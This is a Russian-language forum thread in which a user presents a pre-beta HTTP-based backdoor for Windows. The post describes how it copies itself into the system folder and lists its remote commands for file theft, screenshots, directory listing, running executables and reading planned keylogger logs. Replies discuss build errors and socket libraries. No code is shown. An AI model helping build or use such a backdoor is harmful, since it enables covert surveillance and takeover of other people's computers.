![]() |
jesHTML pre-beta...
Представляю вашему вниманию пред-бета (совсем зеленую) версию моего скромного изваяния...
Небольшой бэкдор , главной отличительной чертой которого является работа по протоколу HTTP. Тоесть вместа клиента используется обычный браузер,висящий на 182 порте. удобен для локалки. По сути это и есть программа для удаленного управления компьютером через веб интерфейc... Скачать можна отсюда. Код совсем сухой , реализованны пока минимальные функции (псевдо ftp, просмотр файлов ,монитора и т п...), но планирую активно развивать... Как использовать: при запуске сам копируется в Windows/system (это пока). Список команд: пример: File C:\test\test.rar >скачть файл пример: Screen >снимок с экрана пример: scan C:\Program files\ (с чертой в конце!) scan C:\ >просмотр папки пример: Run C:\bo.exe а еще удобно Run \\10.170.**.***\bo.exe (из локалки) > запускает exe файл пример: About > выводит версию программы... пример: Look C:\windows\system32\keylogs.txt > комманда для просмотра БУДУЮЩИХ логов клавы , а пока можно ей просто текст/картинки просматривать... ----------------------------------- данную версию выложил для типа багтеста (хотя впринципе она рабочая), хотел бы услышать пожеланий... ...буду всячески модифицировать... вот и всё ,вроде....продолжу ваять) ... |
а исходники можно? просто таких прог полно и exe мало о чем говори
|
Приложению не удались запустится, поскольку rtl60.bpl не был найден.
Повторная установка приложения может исправить эту проблему. типа багтеста |
... Перекомпилил с другими опциями компилятора , выложил поверх старой ссылки...
|
Смотроим секцию .idata
Думаю ее быть не должно, хотя не люблю я Borland С++ == смиотрим .data |
Jes > интересно, ты юзал VCL или Winsock?
|
я не гнался за размером...
заюзал: vcl - ... использовал Инди (можно и под ws2 переписать , лень и т п...) |
Цитата:
Ну, всё равно молодец. |
Цитата:
Дада,интересно,ты юзал winsock или unix ? Сам то хоть понял что спросил ... |
gemaglabin > Я спросил про работу с сокетами: через какой-либо класс библиотеки VCL или при помощи Winsock.
|
| Время: 19:33 |